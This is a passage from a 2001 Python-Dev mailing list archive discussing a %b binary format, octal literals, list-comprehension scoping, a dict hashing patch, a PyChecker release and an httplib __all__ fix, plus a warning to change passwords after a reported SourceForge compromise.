sponsors of this type of legislation should have no difficulty drawing upon long lists of examples of criminal acts reduced by such legislation. That they cannot do so after a century and a half of trying -- that they must sweep under the rug the southern attempts at gun control in the 1870-1910 period, the northeastern attempts in the 1920-1939 period, the attempts at both Federal and State levels in 1965-1976 -- establishes the repeated, complete and inevitable failure of gun laws to control serious crime. -- Senator Orrin Hatch, in a 1982 Senate Report From fdrake at acm.org Thu May 31 00:00:15 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 18:00:15 -0400 (EDT) Subject: [Python-Dev] Most recent documentation update Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> One thing I forgot to mention in my announcement of the update to the development documnetation which I just posted is that I went ahead and converted all but one of the productions in the Reference Manual to the new markup. The print_stmt production, unfortunately, is given twice instead of using a single model for the statement. The formatting tools don't support that (yet), and it's not clear that they should. (No, Barry, don't go changing it...!) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From esr at thyrsus.com Thu May 31 00:03:41 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:03:41 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530180341.A1305@thyrsus.com> Barry A. Warsaw : > > >>>>> "GW" == Greg Wilson writes: > > GW> I would like to add a "%b" format for converting numbers to > GW> binary format (1's and 0's). > > For completeness, wouldn't you also want a binary integer literal so > your students could write binary numbers in their code? And what > about a binary() operator a la hex()? Barry is correct. If we're going to do this, we ought to do it right and support binary on a par with decimal, hex, and octal. I favor this. -- Eric S. Raymond The direct use of physical force is so poor a solution to the problem of limited resources that it is commonly employed only by small children and great nations. -- David Friedman From barry at digicool.com Thu May 31 00:05:37 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 18:05:37 -0400 Subject: [Python-Dev] Most recent documentation update References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> Message-ID: <15125.28337.938136.505675@anthem.wooz.org> >>>>> "Fred" == Fred L Drake, Jr writes: Fred> (No, Barry, don't go changing it...!) Oh darn, three whole days work wasted... :) From tim.one at home.com Thu May 31 00:17:42 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:17:42 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: Note that in Vyper (John Skaller's Python variant) these are legit integer literals: 0b11111111 0B11111111 0o777 0O777 0d999 0D999 0xfFf 0XFFf Vyper's octal notation is still ugly, but whoever first thought 0777 != 777 was a "good idea" was certifiably insane <0.25 wink>. From tim.one at home.com Thu May 31 00:29:33 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:29:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530180509.B1305@thyrsus.com> Message-ID: [Eric S. Raymond] > Is the right answer to add the convert-to-base slot and deprecate the > other two? That would fix "the other" lump here in Python, that e.g. >>> int("111", 3) 13 >>> has no inverse. string->int is happy with any base in 2..36 inclusive, but int->string is spelled via 3 different builtins covering only 3 of those bases. It would be more *expedient* to add "just" a __bin__/nb_bin method + a way to spell binary int literals + a %b format + a bin() builtin. On the fifth hand, I doubt anyone would want to add new % format codes for bases {2..36} - {2, 8, 10, 16}. So it will remain lumpy no matter what. I look forward to the PEP . From esr at thyrsus.com Thu May 31 00:38:33 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:38:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530183833.B1654@thyrsus.com> Tim Peters : > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. For anyone who doesn't know the history behind this... The 0xxx notation was copied from PDP-11 assembler literals -- the instruction-set design of the PDP-11 was such that most of the instruction subfields fit in octal digits, so this convention made it somewhat easier to read machine-code dumps. While I'm at it, I should note that the design of the 11 was ancestral to both the 8088 and 68000 microprocessors, and thus to essentially every new general-purpose computer designed in the last fifteen years. -- Eric S. Raymond "Are we to understand," asked the judge, "that you hold your own interests above the interests of the public?" "I hold that such a question can never arise except in a society of cannibals." -- Ayn Rand From esr at thyrsus.com Thu May 31 00:39:43 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:39:43 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400 References: <20010530180509.B1305@thyrsus.com> Message-ID: <20010530183943.C1654@thyrsus.com> Tim Peters : > [Eric S. Raymond] > > Is the right answer to add the convert-to-base slot and deprecate the > > other two? > > That would fix "the other" lump here in Python, that e.g. > > >>> int("111", 3) > 13 > >>> > > has no inverse. string->int is happy with any base in 2..36 inclusive, but > int->string is spelled via 3 different builtins covering only 3 of those > bases. That sounds like a strong argument to me. -- Eric S. Raymond The world is filled with violence. Because criminals carry guns, we decent law-abiding citizens should also have guns. Otherwise they will win and the decent people will lose. -- James Earl Jones From nas at python.ca Thu May 31 00:38:58 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 30 May 2001 15:38:58 -0700 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530153858.A21901@glacier.fnational.com> Tim Peters wrote: > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. Ever used MacLisp or ZetaLisp? There: 777 == 0d511 If only we had been born with 8 or 16 fingers, right? Neil From thomas at xs4all.net Thu May 31 03:52:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 03:52:48 +0200 Subject: [Python-Dev] SF hacked Message-ID: <20010531035248.G690@xs4all.nl> It *seems*, from this site: http://66.92.75.28/~vladimir/themes-org.html that SourceForge has been hacked, and more seriously than SF first admits (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) And the same goes for apache.org, it looks like. Anyway, if anyone connected *from* any of sourceforge's machines to anywhere else, in the last couple of months, they'll be well advised to change their passwords and check for intruders. The same goes if you connect through ssh and (foolishly ;) allowed ssh-agent-forwarding to the SF machines. In that case, better check all the machines that ssh-agent would give you unpassworded access to for logins you don't recognize. The site above lists a number of sniffed passwords, in case you want to check, but there's no reason for the hacker not to have even more sniffed passwords lying about :) And if you have a login on apache.org, you probably want to change your password in any case.... the above listed site has what seems to be a copy of the shadow password file. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Thu May 31 05:53:53 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 23:53:53 -0400 Subject: [Python-Dev] One more dict trick Message-ID: If anyone has an app known or suspected to be sensitive to dict timing, please try the patch here. Best I've been able to tell, it's a win. But it's a radical change in approach, so I don't want to rush it. This gets rid of the polynomial machinery entirely, along with the branches associated with updating the things, and the dictobject struct member holding the table's poly. Instead it relies on that i = (5*i + 1) % n is a full-period RNG whenever n is a power of 2 (that's what guarantees it will visit every slot), but perturbs that by adding in a few bits from the full hash code shifted right each time (that's what guarantees every bit of the hash code eventually influences the probe sequence, avoiding simple quadratic-time degenerate cases). -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: dict.txt URL: From tim.one at home.com Thu May 31 06:46:56 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:46:56 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530183833.B1654@thyrsus.com> Message-ID: [ESR] > The 0xxx notation was copied from PDP-11 assembler literals -- the > instruction-set design of the PDP-11 was such that most of the > instruction subfields fit in octal digits, so this convention made it > somewhat easier to read machine-code dumps. That doesn't mean they weren't certifiably insane. At Cray, we had a much more sensible convention: *all* numbers were octal (yes, it was a 64-bit box and octal didn't make any sense, but Seymour Cray got used to it from the 60-bit CDC w/ 18-bit address registers and didn't feel like changing). My first boss there loved telling the story about he was out for a drive with the family, and excitedly screamed "Hey, kids! Look! The odometer is just about to change to 40,000!". Of course it read 37,777.9 at the time, and they thought he was nuts. That's where this kind of thing always leads in the end. to-disgrace-despair-and-eventually-ruin-ly y'rs - tim From tim.one at home.com Thu May 31 06:48:28 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:48:28 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530153858.A21901@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Ever used MacLisp or ZetaLisp? There: > > 777 == 0d511 > > If only we had been born with 8 or 16 fingers, right? Then guys would probably be attracted to base 9 or 17. sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs - tim From greg at cosc.canterbury.ac.nz Thu May 31 07:15:24 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:15:24 +1200 (NZST) Subject: [Python-Dev] scoping and list comprehensions In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com> Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz> Skip: > scope: > l = [i**2 for i in range(10)] By analogy with C, the introducer of a new scope should simply be an unadorned colon: : l = [i**2 for i in range(10)] :-) While this might be useful, it doesn't really address the issue raised, because we really need a new scope per listcomp (or maybe even each 'for' in the listcomp). > There's also the problem of how to export results from the scope, though > perhaps the new nested scope stuff provides a solution to that. Nope -- there's still no way to assign to any name in an intermediate scope. Something heretical, such as declarations, would be needed. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:11 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz> Tim: > >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in > digits] Yikes! That would be clearer as [[x,y,z] for x in digits for y in digits for z in digits] I'll concede it's nowhere near as much fun, though... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:41 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Tim: > Needs a PEP, and possibly > even an associated future-statement. Overall, I'm more in favor of changing > it than not. If we do this, we also need to consider whether we want to make the corresponding change to regular for-loops. Seems to me that all the reasons it's a good idea for listcomps apply to for-loops as well. Another advantage of changing both together is that we can continue to describe listcomp semantics in terms of for-loops instead of lambdas. Then we won't have to go into hiding until Guido dies or lifts the fatwah against us. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:17:16 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:17:16 +1200 (NZST) Subject: [Python-Dev] %b format? In-Reply-To: Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Tim: > On the fifth hand, I doubt anyone would want to add new % format codes for > bases {2..36} - {2, 8, 10, 16}. So, just add one general one: %m.nb with n being the base. If n defaults to 2, you can read the "b" as either "base" or "binary". Literals: 0b(5)21403 general 0b11001101 binary Conversion functions: base(x, n) general bin(x) equivalent to base(x, 2) (for symmetry with existing hex, oct) Type slots: __base__(x, n) Backwards compatibility measures: hex(x) --> base(x, 16) oct(x) --> base(x, 8) bin(x) --> base(x, 2) base(x, n) checks __hex__ and __oct__ slots for special cases of n=16 and n=8, falls back on __base__ There, that takes care of integers. Anyone want to do the equivalent for floats ?-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Thu May 31 08:01:54 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 02:01:54 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200 References: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: <20010531020154.A4404@thyrsus.com> Greg Ewing : > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". I had a similar idea, but your version is more elegant. -- Eric S. Raymond The common argument that crime is caused by poverty is a kind of slander on the poor. -- H. L. Mencken From tim_one at email.msn.com Thu May 31 08:20:21 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:20:21 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > If we do this, we also need to consider whether we want > to make the corresponding change to regular for-loops. > Seems to me that all the reasons it's a good idea for > listcomps apply to for-loops as well. I expect there's no chance: unlike listcomps, for-loops allow break statements, and search loops that use the for index after a break (and out of the loop!) are common. > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops But I'm afraid that's also an advantage of leaving both alone. > instead of lambdas. > > Then we won't have to go into hiding until Guido dies or lifts > the fatwah against us. Death won't stop him -- he's Dutch . From tim_one at email.msn.com Thu May 31 08:28:04 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:28:04 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". Except .n has a different meaning already for integer conversions: >>> "%.5d" % 2 '00002' >>> "%.10o" % 377 '0000000571' >>> It would be inconsistent to hijack it to mean something else here. > Literals: > > 0b(5)21403 general I've actually got no use for bases outside {2, 8, 10, 16), and have never heard a request for them either, so I'd be at best -0. Better to stop documenting the full truth about int() <0.9 wink>. > 0b11001101 binary +1. > Conversion functions: > > base(x, n) general -0, as above. > bin(x) equivalent to base(x, 2) (for symmetry with > existing hex, oct) +1 if binary literals are added. > Type slots: > > __base__(x, n) Given the tenor of the above, add __bin__ and call it a day. > Backwards compatibility measures: > > hex(x) --> base(x, 16) > oct(x) --> base(x, 8) > bin(x) --> base(x, 2) > > base(x, n) checks __hex__ and __oct__ slots for special cases > of n=16 and n=8, falls back on __base__ > > There, that takes care of integers. Anyone want to do the > equivalent for floats ?-) Note that C99 introduces a hex notation for floats. From mal at lemburg.com Thu May 31 09:20:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:20:11 +0200 Subject: [Python-Dev] SF hacked References: <20010531035248.G690@xs4all.nl> Message-ID: <3B15F0AB.34F2F664@lemburg.com> Thomas Wouters wrote: > > It *seems*, from this site: > > http://66.92.75.28/~vladimir/themes-org.html > > that SourceForge has been hacked, and more seriously than SF first admits > (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) > And the same goes for apache.org, it looks like. Anyway, if anyone connected > *from* any of sourceforge's machines to anywhere else, in the last couple of > months, they'll be well advised to change their passwords and check for > intruders. The same goes if you connect through ssh and (foolishly ;) > allowed ssh-agent-forwarding to the SF machines. In that case, better check > all the machines that ssh-agent would give you unpassworded access to for > logins you don't recognize. The site above lists a number of sniffed > passwords, in case you want to check, but there's no reason for the hacker > not to have even more sniffed passwords lying about :) > > And if you have a login on apache.org, you probably want to change your > password in any case.... the above listed site has what seems to be a copy > of the shadow password file. FYI, the file's contents are no longer available it seems. Still, SF seems to be alarmed about this: ***************************************************************************** I M P O R T A N T P L E A S E R E A D ***************************************************************************** If you are seeing this it's because we've failed over from pr-shell1. This is a failover server only. As soon as pr-shell1 is better we will cut back to it. So please do not start any daemon process that you care about. - The SF Staff About the password change: this doesn't seem to be possible on the failover machine (I get a permission denied message). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 31 09:33:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:33:36 +0200 Subject: [Python-Dev] One more dict trick References: Message-ID: <3B15F3D0.AD646102@lemburg.com> Tim Peters wrote: > > If anyone has an app known or suspected to be sensitive to dict timing, > please try the patch here. Best I've been able to tell, it's a win. But > it's a radical change in approach, so I don't want to rush it. > > This gets rid of the polynomial machinery entirely, along with the branches > associated with updating the things, and the dictobject struct member > holding the table's poly. Instead it relies on that > > i = (5*i + 1) % n > > is a full-period RNG whenever n is a power of 2 (that's what guarantees it > will visit every slot), but perturbs that by adding in a few bits from the > full hash code shifted right each time (that's what guarantees every bit of > the hash code eventually influences the probe sequence, avoiding simple > quadratic-time degenerate cases). Cool idea... rips out all that algebra garble and replaces it with random beauty :-) In any case, this will avoid use the trouble of having to check those poly numbers every time Intel decides to bump the register width by another factor of two ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 10:43:32 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 04:43:32 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200 References: <3B15F3D0.AD646102@lemburg.com> Message-ID: <20010531044332.B5026@thyrsus.com> M.-A. Lemburg : > In any case, this will avoid use the trouble of having to check > those poly numbers every time Intel decides to bump the register > width by another factor of two ;-) This seems unlikely. 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume a memory density, of, say 2^20 machine words or roughly 8 megabytes per cubic centimeter (much, *much* better than we'll be able to do for the forseeable future -- remember power distribution and heat dissipation). Then, approximating the cubic relation between a sphere's volume and area by lopping off a power of four, we see that 2^64 64-bit words of memory would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 17 million kilometers. This is roughly twice the diameter of the Sun. 64-bit computers aren't going to run out of address space any time soon. 64-bit clocks counting seconds will turn over in approximately six trillion years, long after the expansion of the Universe will have dropped its energy density low enough to make computation...well, let's just say "difficult" and leave it at that. Nobody needs 128 bits of integer or floating-point precision, either. There's basically no source of data to compute with that's got anywhere near 22 significant digits of accuracy -- 48 bits is about the most people in scientific computing ever use. -- Eric S. Raymond [President Clinton] boasts about 186,000 people denied firearms under the Brady Law rules. The Brady Law has been in force for three years. In that time, they have prosecuted seven people and put three of them in prison. You know, the President has entertained more felons than that at fundraising coffees in the White House, for Pete's sake." -- Charlton Heston, FOX News Sunday, 18 May 1997 From mal at lemburg.com Thu May 31 11:23:52 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 11:23:52 +0200 Subject: [Python-Dev] One more dict trick References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <3B160DA8.B9FF9AC2@lemburg.com> "Eric S. Raymond" wrote: > > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > > This seems unlikely. > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > cubic centimeter (much, *much* better than we'll be able to do for the > forseeable future -- remember power distribution and heat dissipation). Where did you get those numbers from ? There are memory sticks with 128 MB around and these measure about 2.5 cm^2 * 1 mm. > Then, approximating the cubic relation between a sphere's volume and area > by lopping off a power of four, we see that 2^64 64-bit words of memory > would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about > 17 million kilometers. > > This is roughly twice the diameter of the Sun. 64-bit computers > aren't going to run out of address space any time soon. > > 64-bit clocks counting seconds will turn over in approximately six > trillion years, long after the expansion of the Universe will have > dropped its energy density low enough to make computation...well, > let's just say "difficult" and leave it at that. > > Nobody needs 128 bits of integer or floating-point precision, either. > There's basically no source of data to compute with that's got > anywhere near 22 significant digits of accuracy -- 48 bits is > about the most people in scientific computing ever use. Just you wait... someday marketing people will probably invent the world memory facility and start assigning a few hundred Terabytes for everyone on this planet to use for his/her data storage -- store once, use everywhere ;-) Let's assume we have 12e9 people on this planet by that time, then we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or roughly 2^80 bytes per civilization. Of course, they will want to run Python in order to manage that data and so will all those Palm uses hooking up to the facility... ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 12:31:07 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 06:31:07 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com> Message-ID: <20010531063107.B5510@thyrsus.com> M.-A. Lemburg : > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > > cubic centimeter (much, *much* better than we'll be able to do for the > > forseeable future -- remember power distribution and heat dissipation). > > Where did you get those numbers from ? There are memory sticks > with 128 MB around and these measure about 2.5 cm^2 * 1 mm. Remember power distribution and heat dissipation. You can't just figure volume of the memory ICs, you have to include power and cooling and structural support too. I eyeballed some DRAM modules I had lying around. In any case, my figures aren't that sensitive to memory density. If I'm off by a factor of 64 the diameter of the memory sphere unly drops by a factor of four (it's that cube-root relationship between volume and radius). So it's only half the radius of the Sun. That's still way, *way* more mass than all the planets in the Solar System put together. > Just you wait... someday marketing people will probably invent the > world memory facility and start assigning a few hundred > Terabytes for everyone on this planet to use for his/her data > storage -- store once, use everywhere ;-) > > Let's assume we have 12e9 people on this planet by that time, then > we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or > roughly 2^80 bytes per civilization. Nah. Individual storage requirements would never get that large. Bill Joy did a study on this once and figured out that human beings can generate about 14GB of text during their lifetimes, max. In a system like the Web-on-steroids one you're supposing, higher-volume stuff like streaming video or Linux-kernel archives would be stored *once* with URLs pointing at them from peoples' individual stores. One terabyte (2^40) per person leaves plenty of headroom (two orders of magnitude larger). We could still handle a world population of 2^24 or roughly 16 billion people. (I think the size of the Library of Congress has been estimated at several thousand terabytes.) -- Eric S. Raymond I don't like the idea that the police department seems bent on keeping a pool of unarmed victims available for the predations of the criminal class. -- David Mohler, 1989, on being denied a carry permit in NYC From thomas at xs4all.net Thu May 31 12:45:33 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 12:45:33 +0200 Subject: [Python-Dev] One more dict trick In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <20010531124533.J690@xs4all.nl> On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote: > M.-A. Lemburg : > > In any case, this will avoid use the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > This seems unlikely. Why ? Bumping register size doesn't mean Intel expects to use it all as address space. They could be used for video-processing, or to represent a modest range of rationals , or to help core 'net routers deal with those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger registers as well. Oh wait... I get it! You were trying to get yourself in the historybooks as the guy that said "64 bits ought to be enough for everyone" :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From beazley at cs.uchicago.edu Thu May 31 15:34:57 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Thu, 31 May 2001 08:34:57 -0500 (CDT) Subject: [Python-Dev] RE: Iteration variables and list comprehensions In-Reply-To: References: Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu> Greg Ewing writes: > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops instead of lambdas. Is this really an advantage? To me, the lambda semantics are a lot more intuitive in terms of matching the way that list comprehensions are actually used and ought to work (although I will agree that the for-loop explanation is a good way to describe the internals of what a list comprehension actually does). I think I would be opposed to changing normal for-loop semantics to match any change made in list-comprehensions. There are too many cases where you use a loop variable after finishing a loop and I suspect that this would break a huge amount of code. For example: for i in r: ... if whatever: break print i Besides, the semantic mismatch created between a listcomp and a for-loop pales in comparison to the mismatch that currently exists between the behavior of listcomps and all of the other operators. Of course, that's just my opinion--I could be wrong. > Then we won't have to go > into hiding until Guido dies or lifts the fatwah against us. fatwah? Uh... should I start talking to the witness protection program folks? Cheers, Dave From skip at pobox.com Thu May 31 20:02:51 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:02:51 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: Message-ID: <15126.34635.67975.31473@beluga.mojam.com> >>>>> "Robin" == Robin Becker writes: Robin> from httplib import * Robin> class Bongo(HTTPConnection): Robin> pass ... Robin> NameError: name 'HTTPConnection' is not defined It was a brain fart on my part when creating httplib.__all__. HTTPConnection was not included in that list. I will check in a fix. In the 2.1 release __all__ was defined as __all__ = ["HTTP"] I have changed that to __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", "HTTPException", "NotConnected", "UnknownProtocol", "UnknownTransferEncoding", "IllegalKeywordArgument", "UnimplementedFileMode", "IncompleteRead", "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader", "ResponseNotReady", "BadStatusLine", "error"] and will check the change into CVS shortly. (Thomas, keep an eye open for this as an addition to 2.1.1.) The workaround I would choose is to not use from "httplib import *": import httplib class Bongo(httplib.HTTPConnection): pass Robin> Changing the * to HTTPConnection in ttt.py removes the problem. Yup, that will also work. Before anyone asks, "Who died and make Skip King?", the scenario as I recall it was that the semantics of __all__ got settled on during discussions on python-dev (the goal of __all__ being to minimize namespace pollution by "from ... *"), but nobody stepped up immediately to do the gtunt work, so I volunteered. The problem in relying on one person (well, at least this one person) to do this was that I had only the following tools at my disposal to decide what belonged in __all__: * what was documented in the lib reference manual (which was at times incomplete) * my experience with the various modules (some of which was specialized, some of which was nonexistent) * the standard library (which generally doesn't use "from ... *" much) * input from python-dev (whose members also appear not to use "from ... *" very liberally) In retrospect, I probably should have polled c.l.py with a summary of what I came up with before the 2.1 ship date. If people would like me to do that now (before 2.2 gets anywhere close to release) to try and fill in as many missing symbols as possible, let me know. -- Skip Montanaro (skip at pobox.com) (847)971-7098 From skip at pobox.com Thu May 31 20:06:01 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:06:01 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin Message-ID: <15126.34825.167026.520535@beluga.mojam.com> I just updated httplib.py to expand the list of names in its __all__ list. I was operating on version 1.34. After the checkin I am looking at version 